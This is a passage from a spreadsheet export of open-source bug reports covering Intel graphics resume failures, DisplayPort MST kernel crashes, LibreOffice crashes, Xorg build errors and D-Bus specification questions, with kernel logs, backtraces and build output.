Often but not always (about half of the time say) when resuming from suspend (to RAM) or hibernate (to disk) I get a black screen instead of the lock screen (X 1.18.4 SDDM 0.13.0 KWin 5.7.5). The mouse cursor is visible and can be moved and often I get a brief flash of the lock screen (or desktop?) before the screen turns black. Such brief flashes also sometimes occur when switching to a VT. VTs do work.
My impression is that it happens more often after I've disconnected from the DP display if not upon the first sleep thereafter then a subsequent one (without intermediate reboot).
I used to be able to reliably resume in the past but since I upgraded from KDE4 to KDE5 many i915-related issues appeared. I'd read that this was known. After a number of updates both to KDE and the kernel version many issues went away. This issue is the only remaining major one.
# Some information gathered
When switching to the console a kernel message sometimes appears:
kernel: [drm:intel_dp_link_training_clock_recovery [i915]] *ERROR* failed to enable link training
kernel: [drm:intel_dp_start_link_train [i915]] *ERROR* failed to start channel equalization
I started following the guide at https://01.org/linuxgraphics/documentation/how-report-bugs so enabled the drm.debug=0x1e log_buf_len=1M options. I attach a resulting dmesg output my impression is that due to the options my dmesg is â€˜filledâ€™ with stuff that may not be relevant.
Also important to note is that since I activated the kernel options I've had a different type of issue which I think essentially locked my computer. The X screen had also turned black and drm-related messages appeared on a VT console I could change to (only one change was possible I think before thinks locked up even further).
# Request
I realize that I haven't followed all instructions at https://01.org/linuxgraphics/documentation/how-report-bugs but I hope the information I provided is enough to get feedback on how to diagnose further.</t>
  </si>
  <si>
    <t>LIBREOFFICE-51100</t>
  </si>
  <si>
    <t>EDITING copy / paste cells in particular .ods will CRASH</t>
  </si>
  <si>
    <t>Created attachment 63055
Sample Document
Steps how to reproduce ith Server Installation of  LibreOffice 3.6.0beta1  German UI/Locale [Build-ID: 1f1cdd8] on German WIN7 Home Premium (64bit):
1. Open attached Sample  socument
2. Click C2 select C2:F2 using mouse
3.  for copy
4. Click C4
5.  for paste
   Expected: contents pasted
   Actual: Crash
ATTENTION: at least my PC frequently looses ability to open existing spreadsheets with any of my later Master or 3.6 server installations after such a crash. Sometimes you can use LibO master again after a reboot of the PC at least 1 times I had to reinstall LibO Master server installation. Currently I do not understand all aspects of this issue. 
It seems this is not a general copy paste problem I used 3.6.0beta1 for several tests it often worked but I saw a rather high crash rate. 
No problem with 3.5.5.1 and  with LOdev 3.6.0alpha0+  English UI/Locale [Build ID: 9518535-d09cf17-8a74106-c695ecd-16afab (libreoffice-3-5-branch-point)]  {Win-x86@9-Voreppe Win32 pull time 2012-02-29 04:21:51}. OS: German WIN7 Home Premium (64bit)</t>
  </si>
  <si>
    <t>DRI-36246</t>
  </si>
  <si>
    <t>i915GM: page table error during x11perf (enable plane too early during hotplug load-detect?)</t>
  </si>
  <si>
    <t>During my tests of a freshly compiled Xorg (current git version)
on an AOpen i915GMm-hfs I started x11perf -all. 
Back at the test machine several hours later I found the keyboard
dead and the screen switched off. A ssh login showed the following kernel messages:
[ 6202.221950] render error detected EIR: 0x00000010
[ 6202.221955] page table error
[ 6202.221957]   PGTBL_ER: 0x00000010
[ 6202.221961] [drm:i915_report_and_clear_eir] *ERROR* EIR stuck: 0x00000010 masking
[ 6202.222093] render error detected EIR: 0x00000010
[ 6202.222096] page table error
[ 6202.222098]   PGTBL_ER: 0x00000010
There were no sign of any errors in the Xorg.log. The PC was idling around.
I killed Xorg. Screen and keyboard came back to life -)</t>
  </si>
  <si>
    <t>XORG-6655</t>
  </si>
  <si>
    <t>Please update config.{guesssub} (needed for GNU/kFreeBSD)</t>
  </si>
  <si>
    <t>A huge number of config.{guesssub} instances in the xorg repository are
outdated and fail to detect GNU/kFreeBSD systems properly (and probably other
systems as well).
Please could you update them?
For what GNU/kFreeBSD detection is concerned any version newer than 2003-10-07
will do.
Thanks</t>
  </si>
  <si>
    <t>LIBREOFFICE-67430</t>
  </si>
  <si>
    <t>EDITING: Properties in Fields of a Form chaotically sorted</t>
  </si>
  <si>
    <t>Created attachment 83114
Sorting of fieldproperties changed from LO 4.0 to LO 4.1
Since 4.1.0.0.beta1 there is a new sorting in the properties of a field in a form. I have searched some times to see that there is nothing new but only changed the old sorting.
Don't know if there is somebody who thought this sorting would be better than the old. For me it gives the impression that these sorting isn't changed by somebody who wants to change the sorting. Seem to be a bug not a feature.</t>
  </si>
  <si>
    <t>TELEPATHY-25848</t>
  </si>
  <si>
    <t>m5-account-plugins</t>
  </si>
  <si>
    <t>butterfly disappeared from account setup</t>
  </si>
  <si>
    <t>Upgraded from 0.4 to 0.5 and after that I can't setup MSN account because it's not in the account setup: select service window. Reinstalled hand rebootet but doesn't have any effect.</t>
  </si>
  <si>
    <t>kuriiri</t>
  </si>
  <si>
    <t>SPECIFICATIONS-95129</t>
  </si>
  <si>
    <t>firm up valid application IDs (wrt. dashes)</t>
  </si>
  <si>
    <t>The desktop entry spec is not clear on what makes a valid application ID other than to specify that it should be a valid D-Bus bus name.  Unfortunately it describes a process for converting the bus name into an object path that assumes that '-' will never appear here.
Explicitly specify that '-' is indeed permitted.  Also specify how to handle this when mapping to an object path.</t>
  </si>
  <si>
    <t>DRI-90609</t>
  </si>
  <si>
    <t>[hsw dp mst] Kernel crash when using DisplayPort MST on W740SU with Dell U2414H</t>
  </si>
  <si>
    <t>Created attachment 115999
Complete dmesg with drm.debug=0x06
Whenever I plug my Dell U2414H monitor (DisplayPort MST enabled) at my Galago Ultrapro/W740SU (Intel Iris Pro Graphics 5200) I get a display hang and then a kernel crash causing a reboot.
Using latest drm-intel-nightly (4.1-rc4+).
My system:
Architecture: amd64
DistroRelease: Ubuntu 15.04
MachineType: System76 Inc. Galago UltraPro
PackageArchitecture: amd64
ProcKernelCmdLine: BOOT_IMAGE=/boot/vmlinuz-4.1.0-994-generic root=UUID=c87bf02e-1fdc-48ca-9392-be946b4de06e ro quiet splash drm.debug=0x06 vt.handoff=7
Uname: Linux evasys 4.1.0-994-generic #201505230305 SMP Sat May 23 02:06:59 UTC 2015 x86_64 x86_64 x86_64 GNU/Linux
Enabled drm.debug=0x06 and after a reboot this is what I got in my syslog:
[   61.338854] WARNING: CPU: 0 PID: 103 at /home/kernel/COD/linux/drivers/gpu/drm/i915/intel_display.c:12262 check_encoder_state+0x165/0x380 [i915]()
[   61.338854] active encoder's pipe doesn't match(expected 1 found 0)
[   61.338872] Modules linked in: ctr ccm xt_CHECKSUM iptable_mangle ipt_MASQUERADE nf_nat_masquerade_ipv4 iptable_nat nf_conntrack_ipv4 nf_defrag_ipv4 nf_nat_ipv4 nf_nat nf_conntrack xt_tcpudp bridge stp llc iptable_filter ip_tables x_tables ec_sys binfmt_misc rfcomm bnep dm_crypt uvcvideo videobuf2_vmalloc hid_logitech_hidpp videobuf2_memops videobuf2_core v4l2_common btusb videodev btbcm btintel media snd_usb_audio arc4 bluetooth snd_usbmidi_lib iwldvm mac80211 x86_pkg_temp_thermal intel_powerclamp coretemp snd_hda_codec_hdmi kvm_intel kvm snd_hda_codec_via snd_hda_codec_generic dm_multipath scsi_dh crct10dif_pclmul snd_hda_intel snd_hda_codec crc32_pclmul iwlwifi ghash_clmulni_intel snd_hda_core aesni_intel snd_hwdep snd_pcm aes_x86_64 lrw gf128mul snd_seq_midi glue_helper snd_seq_midi_event ablk_helper
[   61.338885]  cryptd snd_rawmidi cfg80211 joydev rtsx_pci_ms snd_seq memstick serio_raw mei_me snd_seq_device mei snd_timer lpc_ich shpchp snd hid_logitech_dj soundcore tpm_infineon mac_hid parport_pc ppdev lp parport autofs4 btrfs xor raid6_pq hid_generic usbhid hid i915 rtsx_pci_sdmmc i2c_algo_bit drm_kms_helper e1000e psmouse drm ahci ptp libahci rtsx_pci pps_core wmi video
[   61.338887] CPU: 0 PID: 103 Comm: kworker/0:2 Not tainted 4.1.0-994-generic #201505230305
[   61.338887] Hardware name: Notebook                         W740SU                          /W740SU                           BIOS 4.6.5 09/11/2014
[   61.338894] Workqueue: events_long drm_dp_mst_link_probe_work [drm_kms_helper]
[   61.338896]  0000000000002fe6 ffff8804082f7a88 ffffffff817ff6ab 0000000000005698
[   61.338896]  ffff8804082f7ad8 ffff8804082f7ac8 ffffffff8107d0e7 ffff8804082f7ae8
[   61.338897]  ffff880407d16200 ffff88040830bb30 0000000000000001 ffff88040830b800
[   61.338898] Call Trace:
[   61.338902]  [] dump_stack+0x45/0x57
[   61.338904]  [] warn_slowpath_common+0x97/0xe0
[   61.338905]  [] warn_slowpath_fmt+0x46/0x50
[   61.338919]  [] check_encoder_state+0x165/0x380 [i915]
[   61.338932]  [] intel_modeset_check_state+0x65/0xc0 [i915]
[   61.338944]  [] intel_crtc_set_config+0x158/0x290 [i915]
[   61.338955]  [] drm_mode_set_config_internal+0x66/0x110 [drm]
[   61.338961]  [] restore_fbdev_mode+0xc8/0xf0 [drm_kms_helper]
[   61.338967]  [] drm_fb_helper_restore_fbdev_mode_unlocked+0x30/0x80 [drm_kms_helper]
[   61.338971]  [] drm_fb_helper_set_par+0x22/0x50 [drm_kms_helper]
[   61.338976]  [] drm_fb_helper_hotplug_event+0xcc/0x120 [drm_kms_helper]
[   61.338989]  [] intel_fbdev_output_poll_changed+0x1e/0x20 [i915]
[   61.338994]  [] drm_kms_helper_hotplug_event+0x2b/0x40 [drm_kms_helper]
[   61.339007]  [] intel_dp_mst_hotplug+0x15/0x20 [i915]
[   61.339012]  [] drm_dp_send_link_address+0xf2/0x210 [drm_kms_helper]
[   61.339017]  [] drm_dp_check_and_send_link_address+0x8d/0xa0 [drm_kms_helper]
[   61.339021]  [] drm_dp_mst_link_probe_work+0x1c/0x20 [drm_kms_helper]
[   61.339028]  [] process_one_work+0x144/0x490
[   61.339029]  [] worker_thread+0x11e/0x460
[   61.339031]  [] ? create_worker+0x1f0/0x1f0
[   61.339032]  [] kthread+0xc9/0xe0
[   61.339034]  [] ? flush_kthread_worker+0x90/0x90
[   61.339036]  [] ret_from_fork+0x42/0x70
[   61.339038]  [] ? flush_kthread_worker+0x90/0x90
[   61.339039] ---[ end trace 4ae192082cf55348 ]---
[   61.339040] [drm:check_encoder_state] [ENCODER:43:DP MST-43]
[   61.339041] [drm:check_encoder_state] [ENCODER:44:DP MST-44]
[   61.339042] [drm:check_encoder_state] [ENCODER:47:TMDS-47]
[   61.339043] [drm:check_crtc_state] [CRTC:20]
[   61.339047] [drm:check_crtc_state] [CRTC:24]
[   61.339051] [drm:check_crtc_state] [CRTC:28]
[   61.339052] [drm:check_shared_dpll_state] WRPLL 1
[   61.339053] [drm:check_shared_dpll_state] WRPLL 2
[   61.339054] [drm:intel_crtc_set_config] [CRTC:28] [NOFB]
[   61.339062] [drm:intel_connector_check_state] [CONNECTOR:33:eDP-1]
[   61.339064] [drm:check_encoder_state] [ENCODER:31:DAC-31]
[   61.339065] [drm:check_encoder_state] [ENCODER:32:TMDS-32]
[   61.339066] [drm:check_encoder_state] [ENCODER:40:TMDS-40]
[   61.339067] [drm:check_encoder_state] [ENCODER:42:DP MST-42]
Complete log attached.</t>
  </si>
  <si>
    <t>rsalveti</t>
  </si>
  <si>
    <t>CAIRO-89356</t>
  </si>
  <si>
    <t>compilation error on AIX 6.1 (implicit declaration of function 'getline')</t>
  </si>
  <si>
    <t>And the last one for compiling current git-master with gcc on AIX:
/.../cairo-9999/perf/cairo-analyse-trace.c: In function 'read_excludes':
/.../cairo-9999/perf/cairo-analyse-trace.c:287: error: implicit declaration of function 'getline'
Makefile:952: recipe for target 'cairo-analyse-trace.o' failed
make[4]: *** [cairo-analyse-trace.o] Error 1</t>
  </si>
  <si>
    <t>PACKAGEKIT-29119</t>
  </si>
  <si>
    <t>ALPM backend broken -- patch attached.</t>
  </si>
  <si>
    <t>Created attachment 37139
Fixes the ALPM backend
It appears that the ABI for libalpm has changed.  I've hacked up the backend so that it works for me and generated the attached patch.  If possible I'd like to see this included.
Thanks
Andy</t>
  </si>
  <si>
    <t>andyjstormont</t>
  </si>
  <si>
    <t>XKEYBOARD-CONFIG-4519</t>
  </si>
  <si>
    <t>Wrong brazilian portuguese abnt2 keyboard layout ?</t>
  </si>
  <si>
    <t>Report by a SUSE user:    
----------------------   
My laptop (Acer travelmate 2000) keyboard is an brazilian portuguese abnt2    
keyboard. The combination Alt Gr + q should generate a slash and Alt Gr + w    
should generate a question mark but it generates @ and  respectively.    
My configuration is:    
Keyboard model: Brazilian ABNT2    
layout: Brazil    
The configuration in detail:    
Section InputDevice    
  Driver       kbd    
  Identifier   Keyboard[0]    
  Option       Protocol Standard    
  Option       XkbLayout br    
  Option       XkbModel abnt2    
  Option       XkbRules xfree86    
  Option       XkbVariant xfree86    
EndSection    
He was able to fix it: 
Edit /etc/X11/xkb/symbols/br and add those lines:   
   key   { [         q          Q        slash        slash ] }   
   key   { [         w          W     question     question ] }   
I think this is the correct for the br keyboard. I'm not sure how this affects   
other brazilian keyboards but it shouldn't be a problem since most abtn2   
keyboards doesn't have those keys. My keyboard has those because its a laptop.</t>
  </si>
  <si>
    <t>DRI-51273</t>
  </si>
  <si>
    <t>Kernel panic with dynpm and kernel 3.5</t>
  </si>
  <si>
    <t>Hi
I've been running with the following in my rc.local for a while:
echo dynpm &gt; /sys/class/drm/card0/device/power_method
But when I tried a 3.5 kernel today I got a kernel panic as soon as dynpm was enabled!
Ubuntu kernel 3.5.0-1.1-generic
01:00.0 VGA compatible controller: Advanced Micro Devices [AMD] nee ATI Barts PRO [ATI Radeon HD 6800</t>
  </si>
  <si>
    <t>POPPLER-11723</t>
  </si>
  <si>
    <t>latex-generated pdfs using T1 fontenc do not display correctly</t>
  </si>
  <si>
    <t>The bug has been opened on https://bugs.launchpad.net/bugs/124777
Binary package hint: evince
Trying to open T1 fontenc generated pdfs from latex results in non-aa text and out of place graphics and tables.
The text do not zoom in and out as the rest of the page.
xpdf renders the same pdf(s) the right way.
http://launchpadlibrarian.net/8336085/instrucoes.pdf
atacched a pdf that presents such problem. (sorry 'bout the size)
http://launchpadlibrarian.net/8336094/Captura_da_tela-instrucoes.pdf.png
... and a screenshot of the problem
looks like it affects only gutsy. Rendered correctly with feisty</t>
  </si>
  <si>
    <t>LIBREOFFICE-33895</t>
  </si>
  <si>
    <t>Various issues with .docx documents crashing Writer</t>
  </si>
  <si>
    <t>I downloaded some sample documents from http://openxmldeveloper.org/articles/OpenXMLsamples.aspx namely the file provided at http://openxmldeveloper.org/attachment/30.ashx to try out some things regarding printing and document languages. However when I try to use these documents some of them crash the whole application. 
One of them seems to be related to https://bugs.freedesktop.org/show_bug.cgi?id=33785 and it happens with Office Open XML sample.doc when scrolling a bit down in the document. Copying mtfrenderer.uno.dll to Program\ rather than Basis\Program seems to solve it.
Merely opening Office Open XML sample.docx crashes the application.
Alice's Adventures in Wonderland.docx opens but it's totally blank.
This was tested on Windows XP with LibreOffice 3.3 final.</t>
  </si>
  <si>
    <t>andreas.berger</t>
  </si>
  <si>
    <t>DBUS-26529</t>
  </si>
  <si>
    <t>Enable dbus-launch on windows for configure-based builds.</t>
  </si>
  <si>
    <t>Created attachment 33235
Build dbus-launch from tools under windows if using cross compilation.
Build dbus-launch from tools under windows if using cross compilation.</t>
  </si>
  <si>
    <t>XORG-10015</t>
  </si>
  <si>
    <t>xnest: server does not support XKEYBOARD extension [regression from 4.1.0]</t>
  </si>
  <si>
    <t>This bug has been reported to the Debian BTS 4 years ago by Sean Neakums regarding XFree86 4.2.1 and is still valid for Xorg 7.2.
Whether I start Xnest with no options with -kb or with +kb I cannot
seem to get the XKEYBOARD extension.  It's not listed in xdpyinfo
output. According to the submitter it used to work with XFree86 4.1.0.
This keymap problem makes Xnest pretty hard to use for keyboards
all over the world other than US.
It seems to work fine with Xephyr +kb. I understand that Xephyr should be preferred to Xnest so this bug might never be closed. But at least it will be known.
Thanks.</t>
  </si>
  <si>
    <t>XORG-336</t>
  </si>
  <si>
    <t>libXmu not linked with libXext</t>
  </si>
  <si>
    <t>gcc -O2 -o gnome-smproxy save.o smproxy.o -Wl--export-dynamic 
/usr/lib/libXt.so /usr/lib/libXmu.so /usr/lib/libSM.so /usr/lib/libICE.so
-L/usr/X11R6/lib /usr/lib/libX11.so -pthread /usr/lib/libgnome-2.so
/usr/lib/libesd.so -L/usr/lib /usr/lib/libasound.so /usr/lib/libaudiofile.so
/usr/lib/libgnomevfs-2.so /usr/lib/libgconf-2.so /usr/lib/libbonobo-2.so
/usr/lib/libxml2.so -lz -lssl -lcrypto -lrt /usr/lib/libbonobo-activation.so
/usr/lib/libORBitCosNaming-2.so /usr/lib/libORBit-2.so /usr/lib/libpopt.so
/usr/lib/libgobject-2.0.so /usr/lib/libgthread-2.0.so -lpthread -lm
/usr/lib/libgmodule-2.0.so -ldl /usr/lib/libglib-2.0.so
/usr/lib/libXmu.so: undefined reference to `XShapeCombineMask'
collect2: ld returned 1 exit status
ldd /usr/lib/libXmu.so.6.2.1
        libXt.so.6 =&gt; /usr/lib/libXt.so.6 (0x40024000)
        libSM.so.6 =&gt; /usr/lib/libSM.so.6 (0x40072000)
        libICE.so.6 =&gt; /usr/lib/libICE.so.6 (0x4007a000)
        libX11.so.6 =&gt; /usr/lib/libX11.so.6 (0x40090000)
        libdl.so.2 =&gt; /lib/libdl.so.2 (0x40176000)
        libc.so.6 =&gt; /lib/libc.so.6 (0x40179000)
        libXau.so.0 =&gt; /usr/lib/libXau.so.0 (0x402af000)
        /lib/ld-linux.so.2 =&gt; /lib/ld-linux.so.2 (0x80000000)
ldd /usr/X11/lib/libXmu.so.6.2
        libXt.so.6 =&gt; /usr/lib/libXt.so.6 (0x40025000)
        libSM.so.6 =&gt; /usr/lib/libSM.so.6 (0x40073000)
        libICE.so.6 =&gt; /usr/lib/libICE.so.6 (0x4007b000)
        libXext.so.6 =&gt; /usr/lib/libXext.so.6 (0x40091000)
        libX11.so.6 =&gt; /usr/lib/libX11.so.6 (0x4009f000)
        libc.so.6 =&gt; /lib/libc.so.6 (0x40185000)
        libdl.so.2 =&gt; /lib/libdl.so.2 (0x402bb000)
        libXau.so.0 =&gt; /usr/lib/libXau.so.0 (0x402bf000)
        /lib/ld-linux.so.2 =&gt; /lib/ld-linux.so.2 (0x80000000)</t>
  </si>
  <si>
    <t>DRI-2119</t>
  </si>
  <si>
    <t>via: insufficient security checks on DMA init IOCTL</t>
  </si>
  <si>
    <t>The DRM_IOCTL_VIA_DMA_INIT can be called as a normal user. 
This is of course easy to change but Mesa 3D uses it to check whether AGP DMA
has been initialized and if  not uses the PCI path. 
Either a separate user-callable IOCTL that checks wether AGP DMA has been
initialized is needed or a check for caller privileges is needed for
VIA_INIT_DMA and VIA_CLEANUP_DMA functions whereas VIA_DMA_INITIALIZED should
be allowed as normal user.
Suggestions are appreciated.
/Thomas</t>
  </si>
  <si>
    <t>XORG-8889</t>
  </si>
  <si>
    <t>kdrive-sdl doesn't compile in xorg-server-1.2.99.0</t>
  </si>
  <si>
    <t>gcc -DHAVE_CONFIG_H -I. -I../../../include -I../../../hw/kdrive/src -I../../../miext/damage -I../../../miext/shadow -I../../../Xext -I../../../fb -I../../../mi -Wall -Wpointer-arith -Wstrict-prototypes -Wmissing-prototypes -Wmissing-declarations -Wnested-externs -fno-strict-aliasing -D_BSD_SOURCE -DHAS_FCHOWN -DHAS_STICKY_DIR_BIT -I/usr/include/freetype2   -I../../../include -I../../../include -I../../../Xext -I../../../composite -I../../../damageext -I../../../xfixes -I../../../Xi -I../../../mi -I../../../miext/shadow  -I../../../miext/damage -I../../../render -I../../../randr -I../../../fb -DHAVE_KDRIVE_CONFIG_H     -Wall -Wpointer-arith -Wstrict-prototypes -Wmissing-prototypes -Wmissing-declarations -Wnested-externs -fno-strict-aliasing -D_BSD_SOURCE -DHAS_FCHOWN -DHAS_STICKY_DIR_BIT -I/usr/include/freetype2   -I../../../include -I../../../include -I../../../Xext -I../../../composite -I../../../damageext -I../../../xfixes -I../../../Xi -I../../../mi -I../../../miext/shadow  -I../../../miext/damage -I../../../render -I../../../randr -I../../../fb -O2 -march=i586 -mtune=i686 -fomit-frame-pointer -fweb -frename-registers -MT 
sdl.o -MD -MP -MF .deps/sdl.Tpo -c -o sdl.o sdl.c
sdl.c:33:21: error: kkeymap.h: No such file or directory
sdl.c:173: error: expected '=' '' '' 'asm' or '__attribute__' 
before 'sdlKeyboardFuncs'
sdl.c:182: error: expected '=' '' '' 'asm' or '__attribute__' 
before 'sdlMouseFuncs'</t>
  </si>
  <si>
    <t>TELEPATHY-14620</t>
  </si>
  <si>
    <t>Decide whether Connection.Connect() should be idempotent</t>
  </si>
  <si>
    <t>libtelepathy and telepathy-glib assume that it's OK to call Connect() when the Connection is in the CONNECTING state.
telepathy-glib's tp_connection_run_until_ready() goes further assuming that if the library user requested that Connect() be called if necessary then it's OK to call it even before we know what the status is (i.e. before the first GetStatus() has returned).
In practice I believe all Connect() implementations are idempotent and silently return success at all times (unless the object has been destroyed as a result of a failed attempt to connect).
However the spec says:
          The connection is already connecting or connected
(the markup is wrong though so it doesn't show up in the HTML).
I'm inclined to say that Connect() should indeed be idempotent and we should remove this possible error.
(When we've decided which it should be please tell mardy - MC makes a similar assumption.)</t>
  </si>
  <si>
    <t>XORG-5041</t>
  </si>
  <si>
    <t>7.1 Release Tracker</t>
  </si>
  <si>
    <t>This bug is for tracking the issues blocking the 7.1 release of Xorg.</t>
  </si>
  <si>
    <t>XORG-19148</t>
  </si>
  <si>
    <t>HAL input device detection too greedy</t>
  </si>
  <si>
    <t>With HAL xorg seems to claim every usable device by default. 
Furthermore devices in /dev/input are silenced. This can be proofed by executing 
cat /dev/input/ . 
For example a six-axis 3d connexion SpaceNavigator is now dead to applications using it via /dev/input but behaves as another mouse pointer controller. Pretty useless I think.</t>
  </si>
  <si>
    <t>paul.geisler</t>
  </si>
  <si>
    <t>SHARED-MIME-INFO-10959</t>
  </si>
  <si>
    <t>update-mime-database crashes on incorrect mime definition</t>
  </si>
  <si>
    <t>The bug has been opened on https://bugs.launchpad.net/ubuntu/+source/shared-mime-info/+bug/114241
Binary package hint: update-manager
When upgrading from Edgy to Feisty. I get these errors:
Preparing to replace shared-mime-info 0.18-0ubuntu1 (using .../shared-mime-info_0.20-0ubuntu4_i386.deb) ...
Document `shared-mime-info' is not installed cannot remove.
Document `shared-mime-info' is not installed cannot remove.
Unpacking replacement shared-mime-info ...
* Wrong namespace on document element
* in '/usr/share/mime/packages/freemind.xml'
* (should be http://www.freedesktop.org/standards/shared-mime-info)
Aborted (core dumped)
...
Btw freemind is a custom install. The installation did not go through because the syntax of the xml file is wrong (I think). This is the original file:
  FreeMind Mindmap
I changed it to:
                FreeMind Mindmap
...
What I actually mean is: the install/upgrade of shared-mime-info package did not go through because the syntax of the xml file is wrong (I think).
Debug backtrace of the crash:
Program received signal SIGABRT Aborted.
0xffffe410 in __kernel_vsyscall ()
(gdb) bt
#0  0xffffe410 in __kernel_vsyscall ()
#1  0xb7cbadf0 in raise () from /lib/tls/i686/cmov/libc.so.6
#2  0xb7cbc641 in abort () from /lib/tls/i686/cmov/libc.so.6
#3  0xb7e0a62a in IA__g_logv (log_domain= log_level=G_LOG_LEVEL_ERROR 
    format=0x804eec0 * Wrong namespace on document element\n*   in '%s'\n*   (should be %s)\n 
    args1=0xbfa6e7fc ï¿½\032\006\bHï¿½\004\b !Ý·&amp;) at /build/buildd/glib2.0-2.12.12/glib/gmessages.c:497
#4  0xb7e0a669 in IA__g_log (log_domain=0x0 log_level=G_LOG_LEVEL_ERROR 
    format=0x804eec0 * Wrong namespace on document element\n*   in '%s'\n*   (should be %s)\n)
    at /build/buildd/glib2.0-2.12.12/glib/gmessages.c:517
#5  0x0804caf5 in load_source_file (filename=0x8061ac8 /usr/share/mime/packages/freemind.xml)
    at update-mime-database.c:515
#6  0x0804dc67 in main (argc=Cannot access memory at address 0x2863
) at update-mime-database.c:635
#7  0xb7ca6ebc in __libc_start_main () from /lib/tls/i686/cmov/libc.so.6
#8  0x080498f1 in _start ()</t>
  </si>
  <si>
    <t>SYSTEMD-76623</t>
  </si>
  <si>
    <t>systemctl cannot reset default.target</t>
  </si>
  <si>
    <t>tixxdz</t>
  </si>
  <si>
    <t>code</t>
  </si>
  <si>
    <t>LIBREOFFICE-37197</t>
  </si>
  <si>
    <t>switching a bar chart to a pie chart does not erase a curve fitted to the data</t>
  </si>
  <si>
    <t>Created attachment 46706
screenshot showing the inappropriate description
1. You insert a bar chart into a text document
2. You add a curve fitting to the data with the context menu
3. You convert the bar chart into a pie chart
The legend describing the fitted curve stays in the description of the chart even though the curve itself goes away.</t>
  </si>
  <si>
    <t>SPICE-29289</t>
  </si>
  <si>
    <t>Syntax error in spice_codegen.py</t>
  </si>
  <si>
    <t>When 'make' recive sytax error in spice_codegen.py
[root@localhost spice]# make
make  all-recursive
make[1]: Entering directory `/root/src/spice/spice'
Making all in common
make[2]: Entering directory `/root/src/spice/spice/common'
Making all in win
make[3]: Entering directory `/root/src/spice/spice/common/win'
Making all in my_getopt-1.5
make[4]: Entering directory `/root/src/spice/spice/common/win/my_getopt-1.5'
make[4]: Nothing to be done for `all'.
make[4]: Leaving directory `/root/src/spice/spice/common/win/my_getopt-1.5'
make[4]: Entering directory `/root/src/spice/spice/common/win'
make[4]: Nothing to be done for `all-am'.
make[4]: Leaving directory `/root/src/spice/spice/common/win'
make[3]: Leaving directory `/root/src/spice/spice/common/win'
make[3]: Entering directory `/root/src/spice/spice/common'
make[3]: Nothing to be done for `all-am'.
make[3]: Leaving directory `/root/src/spice/spice/common'
make[2]: Leaving directory `/root/src/spice/spice/common'
Making all in server
make[2]: Entering directory `/root/src/spice/spice/server'
/usr/bin/python2 ../spice_codegen.py --include red_common.h --generate-marshallers -M String -M Rect -M Po                                                                                                                                   int -M DisplayBase -M Fill -M Opaque -M Copy -M Blend -M Blackness -M Whiteness -M Invers -M Rop3 -M Strok                                                                                                                                   e -M Text -M Transparent -M AlphaBlend --server ../spice.proto generated_marshallers.c
Traceback (most recent call last):
  File ../spice_codegen.py line 7 in ?
    from python_modules import spice_parser
  File /root/src/spice/spice/python_modules/spice_parser.py line 5 in ?
    import ptypes
  File /root/src/spice/spice/python_modules/ptypes.py line 1 in ?
    import codegen
  File /root/src/spice/spice/python_modules/codegen.py line 178
    with self.block(if (SPICE_UNLIKELY(%s)) % check):
            ^
SyntaxError: invalid syntax
make[2]: *** [generated_marshallers.c] Error 1
make[2]: Leaving directory `/root/src/spice/spice/server'
make[1]: *** [all-recursive] Error 1
make[1]: Leaving directory `/root/src/spice/spice'
make: *** [all] Error 2</t>
  </si>
  <si>
    <t>xray.id</t>
  </si>
  <si>
    <t>UDISKS-24129</t>
  </si>
  <si>
    <t>please mount vfat disks with shortname=mixed</t>
  </si>
  <si>
    <t>From Ubuntu bug report:
  Since the move to DeviceKit for karmic my removable VFAT-formatted disks are being mounted with shortnames=lower. This breaks e.g. rsync: if a file called FOO is created it will actually appear named foo. Past bugs -- e.g. https://launchpad.net/bugs/15525 and https://launchpad.net/bugs/76200 amongst others -- concluded that shortnames=winnt (or perhaps shortnames=mixed) was the correct setting and this was indeed the case in earlier releases.
  shortnames=lower appears to be set in devicekit-disks's src/devkit-disks-device.c.
The proposed patch is pretty straightforward just changing shortname=lower to shortname=winnt in src/devkit-disks-device.c. However we should have a consensus about this and fix it upstream or not at all.
Was this deliberate or just an oversight? Thanks!</t>
  </si>
  <si>
    <t>LIBREOFFICE-71106</t>
  </si>
  <si>
    <t>EDITING: DDE function crashes LibO.</t>
  </si>
  <si>
    <t>Created attachment 88453
An ODT document illustrating with a screenshot the situation described.
Problem description: 
Entering the third argument in the DDE function parameter input box in the Function Wizard causes LibO to crash.
Steps to reproduce:
1. Open an instance of Calc
2. Open the Function Wizard and double-click the DDE function.
3. Enter correct text inputs into the first two parameter boxes and then click in the third box.
Current behavior:
LibO crashes.
Expected behavior:
That further inputs could be made.
Operating System: Windows XP
Version: 4.1.2.3 release</t>
  </si>
  <si>
    <t>DBUS-34527</t>
  </si>
  <si>
    <t>document UnknownObject UnknownInterface errors</t>
  </si>
  <si>
    <t>Lennart proposed a patch to fix the fact that missing objects missing interfaces and missing methods all result in us raising UnknownMethod:
http://lists.freedesktop.org/archives/dbus/2011-February/014107.html
libdbus can only distinguish between UnknownObject and the others so with Lennart's implementation it will never actually raise UnknownInterface itself but the well-known string is made available for bindings and reimplementations.
For dbus 1.4 I'd be happy to add the well-known strings to dbus-protocol.h if Lennart wants that but I'd rather not take the rest of the patch.
For dbus 1.5 I think the whole change looks good.</t>
  </si>
  <si>
    <t>DBUS-60339</t>
  </si>
  <si>
    <t>Poll constants for QNX not implemented</t>
  </si>
  <si>
    <t>Created attachment 74260
Patch that adds polling constants for QNX
The QNX operating system uses different numeric constants for its poll() arguments than other *nixes.  Due to the way DBus's polling code works these constants must be exactly mirrored in its own flags in order for polling to work correctly.  I've attached a patch which adds the appropriate constants and allows poll() to run correctly on a QNX system.</t>
  </si>
  <si>
    <t>matt.fischer</t>
  </si>
  <si>
    <t>DRI-79237</t>
  </si>
  <si>
    <t>igt/gem_userptr_blits fails</t>
  </si>
  <si>
    <t xml:space="preserve">Created attachment 99819
dmesg
==System Environment==
--------------------------
Regression: Yes. 
It's a igt regression issue the result before was skipped
Non-working platforms: SNB BDW
==kernel==
--------------------------
origin/drm-intel-nightly: c37f30ddc2921eccbf0be87c7742b56fbde53a81(fails)
    drm-intel-nightly: 2014y-05m-23d-13h-57m-55s integration manifest
origin/drm-intel-next-queued: f83d6518a13020e3cf7abbcc6b4e6d34459d9a9f(fails)
    ddrm/i915: Kill private_default_ctx off    
origin/drm-intel-fixes: c1240bd2842f6ec26d7dc1d9c845a197a41d33fe(skips)
    drm/i915: Prevent negative relocation deltas from wrapping
==Bug detailed description==
-----------------------------
igt/gem_userptr_blits fails
Output:
 ./gem_userptr_blits
